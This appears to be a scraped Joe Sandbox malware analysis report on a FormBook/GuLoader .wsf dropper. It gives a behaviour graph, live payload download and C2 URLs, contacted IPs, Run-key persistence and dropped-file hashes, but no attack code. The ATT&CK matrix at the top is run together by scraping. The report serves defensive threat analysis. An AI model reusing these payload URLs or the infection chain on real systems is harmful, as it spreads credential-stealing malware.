        LSASS Memory14
        System Information Discovery
        Remote Desktop Protocol1
        Data from Local System
        1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts11
        Command and Scripting Interpreter
        1
        Registry Run Keys / Startup Folder
        412
        Process Injection
        4
        Obfuscated Files or Information
        Security Account Manager1
        Query Registry
        SMB/Windows Admin Shares1
        Email Collection
        4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell
        Login Hook1
        Registry Run Keys / Startup Folder
        1
        Software Packing
        NTDS221
        Security Software Discovery
        Distributed Component Object ModelInput Capture4
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets2
        Process Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading
        Cached Domain Credentials131
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
        Virtualization/Sandbox Evasion
        DCSync1
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
        Process Injection
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Rundll32
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432342 Sample: CDS AC 661171855-VN1  SOA.wsf Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 49 www.barpa.be 2->49 51 www.smartfindsdepot.shop 2->51 53 2 other IPs or domains 2->53 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 Yara detected FormBook 2->71 73 3 other signatures 2->73 12 wscript.exe 1 2->12         started        15 wab.exe 3 1 2->15         started        17 wab.exe 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 99 VBScript performs obfuscated calls to suspicious functions 12->99 101 Suspicious powershell command line found 12->101 103 Wscript starts Powershell (via cmd or directly) 12->103 105 4 other signatures 12->105 21 powershell.exe 14 19 12->21         started        process6 dnsIp7 55 87.121.105.163, 49699, 49707, 80 NET1-ASBG Bulgaria 21->55 79 Suspicious powershell command line found 21->79 81 Very long command line found 21->81 83 Found suspicious powershell code related to unpacking or dynamic code loading 21->83 25 powershell.exe 17 21->25         started        28 conhost.exe 21->28         started        30 cmd.exe 1 21->30         started        signatures8 process9 signatures10 93 Writes to foreign memory regions 25->93 95 Found suspicious powershell code related to unpacking or dynamic code loading 25->95 97 Hides threads from debuggers 25->97 32 wab.exe 6 25->32         started        35 cmd.exe 1 25->35         started        process11 signatures12 63 Maps a DLL or memory area into another process 32->63 65 Hides threads from debuggers 32->65 37 qdSMStVpAfAXHdDEbm.exe 32->37 injected process13 signatures14 75 Maps a DLL or memory area into another process 37->75 77 Found direct / indirect Syscall (likely to bypass EDR) 37->77 40 recover.exe 1 13 37->40         started        process15 signatures16 85 Tries to steal Mail credentials (via file / registry access) 40->85 87 Tries to harvest and steal browser information (history, passwords, etc) 40->87 89 Modifies the context of a thread in another process (thread injection) 40->89 91 2 other signatures 40->91 43 qdSMStVpAfAXHdDEbm.exe 40->43 injected 47 firefox.exe 40->47         started        process17 dnsIp18 57 barpa.be 192.185.96.244, 80 UNIFIEDLAYER-AS-1US United States 43->57 59 www.smartfindsdepot.shop 23.82.11.73, 49712, 49713, 49714 LEASEWEB-USA-WDCUS United States 43->59 61 www.jackcliu.com 45.194.181.142, 49711, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 43->61 107 Found direct / indirect Syscall (likely to bypass EDR) 43->107 signatures19

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        CDS AC 661171855-VN1 SOA.wsf17%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        https://go.micro0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        http://87.121.105.163/AKaUDBTG140.bin0%Avira URL Cloudsafe
        http://87.121.105.163/domkapitler.msiP0%Avira URL Cloudsafe
        http://87.121.105.1630%Avira URL Cloudsafe
        http://87.121.105.163/AKaUDBTG140.binb0%Avira URL Cloudsafe
        http://87.121.105.163/domkapitler.msi0%Avira URL Cloudsafe
        http://www.smartfindsdepot.shop/u88q/0%Avira URL Cloudsafe
        http://www.jackcliu.com/u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfX0%Avira URL Cloudsafe
        http://87.121.105.163/domkapitler.msiXR0%Avira URL Cloudsafe
        http://87.121.105.163/AKaUDBTG140.bin~OU0%Avira URL Cloudsafe
        http://87.121.105.163//0%Avira URL Cloudsafe
        http://87.121.105.163/AKaUDBTG140.bin/0%Avira URL Cloudsafe
        http://www.smartfindsdepot.shop/u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g=0%Avira URL Cloudsafe
        http://crl.microv0%Avira URL Cloudsafe
        http://87.121.H0%Avira URL Cloudsafe
        http://www.smartfindsdepot.shop0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        www.smartfindsdepot.shop
        23.82.11.73
        truefalse
          unknown
          barpa.be
          192.185.96.244
          truefalse
            unknown
            www.jackcliu.com
            45.194.181.142
            truefalse
              unknown
              www.barpa.be
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://87.121.105.163/domkapitler.msifalse
                • Avira URL Cloud: safe
                unknown
                http://www.jackcliu.com/u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfXfalse
                • Avira URL Cloud: safe
                unknown
                http://www.smartfindsdepot.shop/u88q/false
                • Avira URL Cloud: safe
                unknown
                http://87.121.105.163/AKaUDBTG140.binfalse
                • Avira URL Cloud: safe
                unknown
                http://www.smartfindsdepot.shop/u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g=false
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://87.121.105.163/AKaUDBTG140.binbwab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://duckduckgo.com/chrome_newtabrecover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/ac/?q=recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icorecover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://go.micropowershell.exe, 00000002.00000002.2516302962.000002431E15B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://87.121.105.163/domkapitler.msiPpowershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://87.121.105.163powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2516302962.000002431EC0E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://www.ecosia.org/newtab/recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://87.121.105.163/domkapitler.msiXRpowershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ac.ecosia.org/autocomplete?q=recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://87.121.105.163//wab.exe, 0000000A.00000002.2619504780.0000000004332000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://87.121.105.163/AKaUDBTG140.bin~OUwab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrecover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://87.121.105.163/AKaUDBTG140.bin/wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.microvpowershell.exe, 00000005.00000002.2451195111.00000000070E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://87.121.Hpowershell.exe, 00000002.00000002.2516302962.000002431EDC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://www.smartfindsdepot.shopqdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                45.194.181.142
                                                www.jackcliu.comSeychelles
                                                134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                                                192.185.96.244
                                                barpa.beUnited States
                                                46606UNIFIEDLAYER-AS-1USfalse
                                                87.121.105.163
                                                unknownBulgaria
                                                43561NET1-ASBGfalse
                                                23.82.11.73
                                                www.smartfindsdepot.shopUnited States
                                                30633LEASEWEB-USA-WDCUSfalse
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1432342
                                                Start date and time:2024-04-26 21:55:12 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 32s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:17
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:CDS AC 661171855-VN1 SOA.wsf
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winWSF@19/8@3/4
                                                EGA Information:
                                                • Successful, ratio: 40%
                                                HCA Information:
                                                • Successful, ratio: 82%
                                                • Number of executed functions: 118
                                                • Number of non-executed functions: 262
                                                Cookbook Comments:
                                                • Found application associated with file extension: .wsf
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target powershell.exe, PID 1364 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7108 because it is empty
                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: CDS AC 661171855-VN1 SOA.wsf
                                                TimeTypeDescription
                                                21:56:02API Interceptor100x Sleep call for process: powershell.exe modified
                                                21:56:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run T61TH2R0 C:\Program Files (x86)\windows mail\wab.exe
                                                21:57:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run T61TH2R0 C:\Program Files (x86)\windows mail\wab.exe
                                                21:57:31API Interceptor56x Sleep call for process: recover.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                87.121.105.163DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                • 87.121.105.163/PUzAKuQ35.bin
                                                PO_La-Tanerie04180240124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • 87.121.105.163/YSnpkrCwWalJFSpN146.bin
                                                FTG_PD_04024024001.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 87.121.105.163/EYioOXUtWs45.bin
                                                Doc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 87.121.105.163/TjtonPwEiP175.bin
                                                Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 87.121.105.163/icjFpYDkBweqyeZ252.bin
                                                PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 87.121.105.163/vhhJQWfiJN142.bin
                                                Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 87.121.105.163/fBizb192.bin
                                                BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                                                SCMP_#U547d#U4ee4_004020024001.wsfGet hashmaliciousUnknownBrowse
                                                • 87.121.105.163/Assumes122.java
                                                PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 87.121.105.163/kvRPYpXycVNsTooeadG247.bin
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                UNIFIEDLAYER-AS-1USMSG.docxGet hashmaliciousUnknownBrowse
                                                • 192.185.166.178
                                                MSG.docxGet hashmaliciousUnknownBrowse
                                                • 192.185.166.178
                                                https://doc-42.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                • 192.185.144.111
                                                https://control.mailblaze.com/index.php/survey/wq790f4mf09e0Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                • 162.241.114.35
                                                rPO50018137-14_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                • 108.167.140.123
                                                http://www.alserhgroup.com/Get hashmaliciousUnknownBrowse
                                                • 192.185.48.207
                                                Packing List PDF.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 50.87.195.61
                                                PONO6188.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                • 192.185.13.234
                                                Payment details.exeGet hashmaliciousAgentTeslaBrowse
                                                • 50.87.145.190
                                                Docs.exeGet hashmaliciousAgentTeslaBrowse
                                                • 50.87.219.149
                                                LEASEWEB-USA-WDCUShttps://pub-9af459faa3e54a63ae5d1f2be8790ad0.r2.dev/get-authenticated.htmlGet hashmaliciousUnknownBrowse
                                                • 207.244.91.222
                                                https://iij110.z27.web.core.windows.net/werrx01USAHTML/?bcda=1-855-399-1052Get hashmaliciousTechSupportScamBrowse
                                                • 207.244.126.81
                                                https://url.us.m.mimecastprotect.com/s/qkT5Cv2pWyUOjZODty9fnF?domain=google.comGet hashmaliciousUnknownBrowse
                                                • 162.210.196.208
                                                https://ppo46-secondary.z8.web.core.windows.net/werrx01USAHTML/?bcda=1-833-293-0124Get hashmaliciousTechSupportScamBrowse
                                                • 207.244.126.81
                                                https://zzv4-secondary.z13.web.core.windows.net/werrx01USAHTML/?bcda=1-833-693-8251Get hashmaliciousTechSupportScamBrowse
                                                • 207.244.126.81
                                                https://apppbx07.z13.web.core.windows.net/Win0security-helpline07/index.html?ph0n=+1-000-000-0000Get hashmaliciousTechSupportScamBrowse
                                                • 207.244.126.81
                                                https://hub49.z1.web.core.windows.net/werrx01USAHTML/?bcda=1-833-293-0118Get hashmaliciousTechSupportScamBrowse
                                                • 207.244.126.81
                                                http://www.agilgas.com.br/wp-content/uploads/2024/04/tryythgghjhgfj.html#T0RQQ2pCOVhPSTJvNm12WEYvSGFNOUI2Q3J4bElveUFOazNibHR2QWI4SGp2aG4yU2kwVytiSzF6WjZnZXN5YUFpUTM5dmpINHlOM2JXdGVtdUM3c2UyMk1yVXROeVVDVVMzYUdOeHFWdDg9Get hashmaliciousPhisherBrowse
                                                • 216.22.16.40
                                                https://i.imgur.com/EoTj4iI.pngGet hashmaliciousUnknownBrowse
                                                • 23.105.12.137
                                                https://i.imgur.com/VlAllek.pngGet hashmaliciousUnknownBrowse
                                                • 23.105.12.120
                                                NET1-ASBGxsyGizeAYW.elfGet hashmaliciousMiraiBrowse
                                                • 93.123.85.49
                                                95sOS6Fo3w.elfGet hashmaliciousMiraiBrowse
                                                • 93.123.85.49
                                                mG0CUyFnyP.elfGet hashmaliciousGafgytBrowse
                                                • 94.156.79.48
                                                RsrhTw5KFy.elfGet hashmaliciousGafgytBrowse
                                                • 94.156.79.48
                                                5JWSChksKD.elfGet hashmaliciousGafgytBrowse
                                                • 94.156.79.48
                                                0ll10IxBC6.elfGet hashmaliciousGafgytBrowse
                                                • 94.156.79.48
                                                7485bZ2fug.elfGet hashmaliciousMiraiBrowse
                                                • 93.123.85.49
                                                O67YVCzJU1.elfGet hashmaliciousGafgytBrowse
                                                • 94.156.79.48
                                                BXj2uizaOx.elfGet hashmaliciousGafgytBrowse
                                                • 94.156.79.48
                                                J8jOJ7v2Ia.elfGet hashmaliciousMiraiBrowse
                                                • 93.123.85.49
                                                DXTL-HKDXTLTseungKwanOServiceHKWwKYOW4jIg.elfGet hashmaliciousMiraiBrowse
                                                • 156.235.189.156
                                                ccm9HqTuky.elfGet hashmaliciousMiraiBrowse
                                                • 154.221.154.24
                                                g2PqnVy6cQ.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 154.94.101.180
                                                lS1NKOikEf.exeGet hashmaliciousUnknownBrowse
                                                • 156.255.0.191
                                                Wt3pGldAnr.exeGet hashmaliciousUnknownBrowse
                                                • 156.255.0.191
                                                Wt3pGldAnr.exeGet hashmaliciousUnknownBrowse
                                                • 156.255.0.191
                                                SecuriteInfo.com.FileRepMalware.20155.16240.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 156.239.92.108
                                                kl7nWo7u71.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 156.235.229.60
                                                OPs5j7Yjb8.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 156.235.142.141
                                                hYN45tzxwl.elfGet hashmaliciousMiraiBrowse
                                                • 154.93.171.8
                                                No context
                                                No context
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):11608
                                                Entropy (8bit):4.886255615007755
                                                Encrypted:false
                                                SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                MD5:C7F7A26360E678A83AFAB85054B538EA
                                                SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                Malicious:false
                                                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                Malicious:false
                                                Preview:@...e................................................@..........
                                                Process:C:\Windows\SysWOW64\recover.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                Category:dropped
                                                Size (bytes):196608
                                                Entropy (8bit):1.1239949490932863
                                                Encrypted:false
                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                MD5:271D5F995996735B01672CF227C81C17
                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
